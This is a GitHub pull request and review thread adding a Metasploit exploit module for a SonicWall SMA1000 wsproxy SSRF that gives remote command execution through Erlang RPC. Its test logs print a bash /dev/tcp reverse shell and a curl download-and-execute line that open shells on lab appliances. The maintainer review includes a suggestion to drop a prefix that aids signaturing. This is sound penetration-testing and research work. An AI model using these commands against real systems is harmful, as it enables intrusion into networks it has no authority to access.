### PR TITLE
linux/http: Add SonicWall SMA1000 WorkPlace wsproxy SSRF exploit module (CVE-2026-15409)

### PR DESCRIPTION
**Pull request by dheiland-r7**
## Description

This PR adds a new exploit module for **CVE-2026-15409**, a Server-Side Request Forgery (SSRF) vulnerability in the SonicWall SMA1000 WorkPlace `wsproxy` service.

The vulnerable `wsproxy` endpoint can proxy WebSocket traffic to internal services that are otherwise unreachable. This module leverages that capability to access the internal Erlang distribution service, authenticate using the known Erlang distribution cookie, and invoke `os:cmd/1` through Erlang RPC to execute arbitrary Unix commands in the context of the vulnerable SMA service.

Unlike exploitation, the `check` method performs a benign `erlang:node/0` RPC to validate the vulnerable communication path without executing an operating system command.

This module supports Unix command payloads, reverse shell payloads, AutoCheck, and multi-target execution (`RHOSTS`). A corresponding module documentation file has also been included.

**Related Issue:** 
None

## Breaking Changes
None

## Verification Steps

1. Start `msfconsole`.

2. Load the module:
   ```
   use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
   ```

3. Configure the target:
   ```
   set RHOSTS <target>
   set TARGETURI /
   ```

4. Execute:
   ```
   check
   ```

5. Verify the module reports the target as vulnerable by successfully performing a benign Erlang `erlang:node/0` RPC.

6. Configure a command or reverse shell payload.

7. Execute:
   ```
   run
   ```
8. Verify arbitrary Unix command execution or successful session creation.

## Test Evidence

msf > use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set RHOSTS 10.10.10.49-52
RHOSTS => 10.10.10.49-52
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set LHOST 10.10.10.5
LHOST => 10.10.10.5
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set LPORT 4444
LPORT => 4444
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > run
[*] Exploiting target 10.10.10.49
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The wsproxy WebSocket upgrade was rejected: The WebSocket connection failed "set ForceExploit true" to override check result.
[*] Exploiting target 10.10.10.50
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The wsproxy WebSocket upgrade was rejected: The WebSocket connection failed "set ForceExploit true" to override check result.
[*] Exploiting target 10.10.10.51
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Authenticated to internal Erlang node couchdb@127.0.0.1; erlang:node/0 returned couchdb@127.0.0.1
[*] Executing command through Erlang os:cmd/1: bash -c '0<&85-;exec 85<>/dev/tcp/10.10.10.5/4444;sh <&85 >&85 2>&85'
[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.51:39040) at 2026-07-16 09:54:26 -0400
[+] Session created; ignoring the expected Erlang RPC/WebSocket timeout from the still-running command shell.
[*] Session 1 created in the background.
[*] Exploiting target 10.10.10.52
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The wsproxy WebSocket upgrade was rejected: The WebSocket connection failed "set ForceExploit true" to override check result.
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.10.5:4444 -> 10.10.10.51:39040 (10.10.10.51)

msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > sessions -i 1
[*] Starting interaction with 1...

whoami
couchdb
ls -al
total 140
drwxr-xr-x  9 root root   4096 Jun 19 17:14 .
drwxr-xr-x  3 root root   4096 Jun 19 17:14 ..
-rw-r--r--  1 root root 104255 Aug 23  2025 LICENSE
drwxr-xr-x  2 root root   4096 Jun 19 17:14 bin
drwxr-xr-x  5 root root   4096 Jun 19 17:14 erts-13.1.5
drwxr-xr-x  4 root root   4096 Aug 23  2025 etc
drwxr-xr-x 52 root root   4096 Jun 19 17:14 lib
drwxr-xr-x  3 root root   4096 Aug 23  2025 releases
drwxr-xr-x  3 root root   4096 Aug 23  2025 share
drwxr-xr-x  3 root root   4096 Aug 23  2025 var
exit
[*] 10.10.10.51 - Command shell session 1 closed.

## Environment

| Field                                               | Details                                                  |
| ----------------------------------| -------------------------------------------------------- |
| **Operating System**                     | Ubuntu 25.04 (ARM64 development environment)             |
| **Target Software/Hardware**       | SonicWall SMA1000 appliance V12.5.0 vulnerable to CVE-2026-15409 |
| **Docker Image / Vagrant Setup** | Not applicable                                           |

## AI Usage Disclosure

OpenAI ChatGPT was used to assist with documentation drafting, wording refinement, code review, and implementation review. Vulnerability research, exploit development, testing, debugging, and validation were performed by the authors.

## Pre-Submission Checklist

* [x] Included a corresponding documentation markdown file in `documentation/modules`
* [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
* [x] Tested on the target environment specified in the Environment section above
* [ ] Included RSpec tests for library changes *(not applicable; no library changes)*
* [x] Read the CONTRIBUTING.md and module acceptance guidelines

### CODE REVIEW

File: documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
Comment (cdelafuente-r7) [inline documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md:1]: Would it be possible to run `msftidy_docs.rb` against this file and address the reported issues:
```
ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md
```

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 1]
```diff
@@ -0,0 +1,565 @@
...
+               DFLAG_MAP_TAG |
+               DFLAG_BIG_CREATION |
+               DFLAG_HANDSHAKE_23
+
+  SmaReadyFrame = "\x0b\x00\x00\x00\x00".b
+
+  Pid = Struct.new(:node, :ident, :serial, :creation)
+  Reference = Struct.new(:node, :ident, :creation)
+
+  class SmaWebSocketTransport
```
Comment (cdelafuente-r7) [inline modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: I haven't looked into all the details, but it looks like part of the WebSocket is being use here. Is there any reason to not use the full WebSocket implementation we already have?

Also, if this class is not really specific to this exploit, I believe having it part of the library would be better.

If something is not working or is missing in the current WebSocket library implementation, we usually prefer having it fixed since it can be beneficial for other modules.

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 2]
```diff
@@ -0,0 +1,565 @@
...
+          frame = @wsock.get_wsframe
+          return nil if frame.nil?
+
+          opcode = frame.header.opcode
+          payload = frame.payload_data.to_s.b
+
+          case opcode
+          when Rex::Proto::Http::WebSocket::Opcode::TEXT,
+               Rex::Proto::Http::WebSocket::Opcode::BINARY
+            return payload
```
[the remark this answers is not in the document]
Comment (dheiland-r7) [reply modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: The Base64 encoding is intentionally asymmetric and matches the original working PoC. Client-to-server Erlang packets are Base64-encoded and sent in WebSocket text frames, but responses from the SMA wsproxy endpoint contain the raw Erlang distribution data.

The reference PoC does not Base64-decode received text messages; it converts text messages directly to bytes. The current module has also been validated against a vulnerable SMA1000 appliance and successfully completes the Erlang handshake, cookie authentication, RPC calls, and command execution with the existing receive behavior.

Base64-decoding incoming TEXT frames would therefore potentially corrupt the Erlang packets or raise an invalid Base64 error, so I have not applied this suggested change.

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 3]
```diff
@@ -0,0 +1,565 @@
...
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'SMA WorkPlace base path', '/']),
+        OptString.new('WSHOST', [true, 'Internal host supplied to wsproxy', '0.0.0.0']),
```
[the remark this answers is not in the document]
Comment (dheiland-r7) [reply modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb:194]: I tested the suggested 127.0.0.1 default against the vulnerable SMA1000 appliance, and it failed to reach the internal Erlang service. The existing 0.0.0.0 value successfully reaches the service and completes the Erlang handshake, cookie authentication, and RPC call.

Although 0.0.0.0 is normally an unspecified address rather than a conventional TCP destination, Linux may treat a connection to it as local-host traffic. In this case, the exact behavior also depends on how the SMA wsproxy backend creates and routes the proxied socket. The internal service may be listening on a wildcard address or may be reachable through the proxy’s network context using 0.0.0.0, while explicit loopback access through 127.0.0.1 is not available from that same context.

Since this is confirmed appliance-specific behavior and changing the default to 127.0.0.1 breaks exploitation, I am retaining `0.0.0.0` as the tested working default.

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb (hunk 1 above)
Comment (dheiland-r7) [reply modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: After examining the existing WebSocket implementation in this module, I agree that the current transport wrapper duplicates functionality already provided by `Rex::Proto::Http::WebSocket::Interface::Channel` and `wsloop`, including message reassembly, ping/pong handling, close processing, and the stream abstraction.

The remaining custom behavior is specific to the SMA Connect Agent protocol rather than WebSocket itself: outgoing Erlang packets must be Base64-encoded and sent as text messages, and the initial five-byte SMA ready message must be filtered before exposing the Erlang byte stream.

I plan to rework the module to subclass the existing WebSocket channel and implement only `on_data_write` and `on_data_read` for those SMA-specific transformations. The Erlang distribution and RPC code can then use the channel’s standard `read` and `write` interface. I do not currently see a missing generic WebSocket feature that would require a Framework library change. Does this make since and meet expectations.

Comment (dheiland-r7) [reply modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: I implemented an initial rededign based on the above comments, but it exposed some issues during testing. I'm working back through the design to better align with the existing WebSocket implementation while preserving the required protocol behavior. I'll update the PR once I have a working implementation that meets those expectations.

**Comment by dheiland-r7** [comment]
Holding pattern while i do some more follow up testing , may need to add a few correction or at minimum update documentation on testing/validation

**Comment by dheiland-r7** [comment]
Ok finished retesting and also updated sonicwall_sma1000_wsproxy_rce.md so it shows the full version and setup requirements that are exploitable using the module

File: documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md [hunk 4]
```diff
@@ -0,0 +1,184 @@
...
+| Option | Description |
+|--------|-------------|
+| RHOSTS | Target appliance(s). |
+| TARGETURI | SMA WorkPlace base path. |
+| BMID | Bookmark identifier used by the WorkPlace WebSocket session. |
+| ERLANG_COOKIE | Erlang distribution cookie used for authentication. |
+| SERVICE_TYPE | WorkPlace service type (default: SSH). |
+| WSHOST | Internal host supplied to `wsproxy`. |
+| WSPORT | Erlang distribution service port (default: 1050). |
+| WS_READ_TIMEOUT | WebSocket receive timeout. |
```
Comment (jheysel-r7) [inline documentation/modules/exploit/linux/http/sonicwall_sma1000_wsproxy_rce.md]: While this table rendered nicely in markdown, the standard is to list only the options unique to the module as sub-headers like so:
```suggestion
### BMID
Bookmark identifier used by the WorkPlace WebSocket session. 

### ERLANG_COOKIE
Erlang distribution cookie used for authentication. 

### SERVICE_TYPE 
WorkPlace service type (default: SSH). 

### WSHOST
Internal host supplied to `wsproxy`. 

### WSPORT 
Erlang distribution service port (default: 1050). 

### WS_READ_TIMEOUT 
WebSocket receive timeout. 
```

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 5]
```diff
@@ -0,0 +1,560 @@
...
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ryan Emmons', # Original Python PoC research and development
+          'Deral Heiland', # Metasploit module testing and development
+          'Rapid7 Vulnerability Research'
+        ],
+        'References' => [
+          ['CVE', '2026-15409'],
+          ['URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008']
```
Comment (jheysel-r7) [inline modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: Shout out R7 
```suggestion
          ['URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008'],
          ['URL', 'https://www.rapid7.com/blog/post/etr-rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/']
```

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 6]
```diff
@@ -0,0 +1,560 @@
...
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
```
Comment (jheysel-r7) [inline modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: We usually let the framework choose the default payload unless there's an issue with the default. The framework right now should default to a meterpreter fetch payload.

I noticed in my testing the default `FETCH_WRITABLE_DIR ` isn't writable (which is `./` the working directory of the RCE) so set this value here: 
```suggestion
          'FETCH_WRITABLE_DIR' => '/tmp',
```

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 7]
```diff
@@ -0,0 +1,560 @@
...
+    default_port = ssl ? 443 : 80
+    authority = vhost
+    authority = "#{authority}:#{rport}" unless rport == default_port
+    "#{scheme}://#{authority}"
+  end
+
+  def erlang_node_name
+    return datastore['NODE_NAME'] unless datastore['NODE_NAME'].blank?
+
+    "msf_#{Rex::Text.rand_text_numeric(6)}@127.0.0.1"
```
Comment (jheysel-r7) [inline modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: For signaturing purposes it would be best to drop the `msf_` prefix 
```suggestion
    "#{Rex::Text.rand_text_numeric(6)}@127.0.0.1"
```

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 8]
```diff
@@ -0,0 +1,560 @@
...
+          ['CVE', '2026-15409'],
+          ['URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008']
+        ],
+        'DisclosureDate' => '2026-07-14',
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
```
Comment (jheysel-r7) [inline modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb]: In metasploit for "Platform" we differentiate between "unix" payloads and "linux" payloads. By adding "linux" as a supported platform here we are able to increase the number payloads the operator can choose from. 
```suggestion
              'Platform' => %w[unix linux],
```

**Review by jheysel-r7 — COMMENTED** [review]
Hey @dheiland-r7, thanks for the great module. Just a couple comments. Seems appropriate to leave the `SmaErlangWebSocketAdapter` in this module. If there's a patch bypass or incredibly similar exploit module being written we can pull it out later. 

## Testing 
```
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set rhosts 172.16.199.90
rhosts => 172.16.199.90
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set fetch_writable_dir /tmp
fetch_writable_dir => /tmp
rumsf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Authenticated to internal Erlang node couchdb@127.0.0.1; erlang:node/0 returned couchdb@127.0.0.1
[*] Executing command through Erlang os:cmd/1: curl -so /tmp/JPevgXfMfQl http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x /tmp/JPevgXfMfQl;/tmp/JPevgXfMfQl&
[+] RPC completed through couchdb@127.0.0.1
{}
[*] Sending stage (3090404 bytes) to 172.16.199.90
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.90:6570) at 2026-07-28 15:09:46 -0700

meterpreter > getuid
Server username: couchdb
meterpreter > sysinfo
Computer     : SMAAppliance.sma
OS           : Debian 12.13 (Linux 6.1.170)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
````

**Comment by dheiland-r7** [comment]
finished testing and accepting changes yesterday. Anything else needed by me ?

**Comment by jheysel-r7** [comment]
Thanks @dheiland-r7 - everything looks good to me. We'll get a quick second review as per the new review process and if everything looks good to them as well, I'll get this landed 👍

File: modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb [hunk 9]
```diff
@@ -0,0 +1,561 @@
...
+    fail_with(Failure::UnexpectedReply, e.message)
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  rescue Rex::TimeoutError => e
+    # A reverse or bind command shell can keep Erlang os:cmd/1 blocked even
+    # after Metasploit has successfully registered the new session. Only
+    # suppress the transport timeout when the framework confirms a session.
+    raise e unless session_created?
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb:556]: not a blocker: not all payloads will open sessions, but looks good to me :+1:

Comment (jheysel-r7) [reply modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb:556]: Good call out. I'd agree that this is good to ship as is.  For context / example the `cmd/unix/generic` payload won't return a session, it's used to send single commands to the target ex: `touch /tmp/test`

**Review by jheysel-r7 — APPROVED** [review]

**Comment by jheysel-r7** [comment]
# Release Notes
This adds a new exploit module for CVE-2026-15409, a Server-Side Request Forgery (SSRF) vulnerability in the SonicWall SMA1000 WorkPlace wsproxy service.
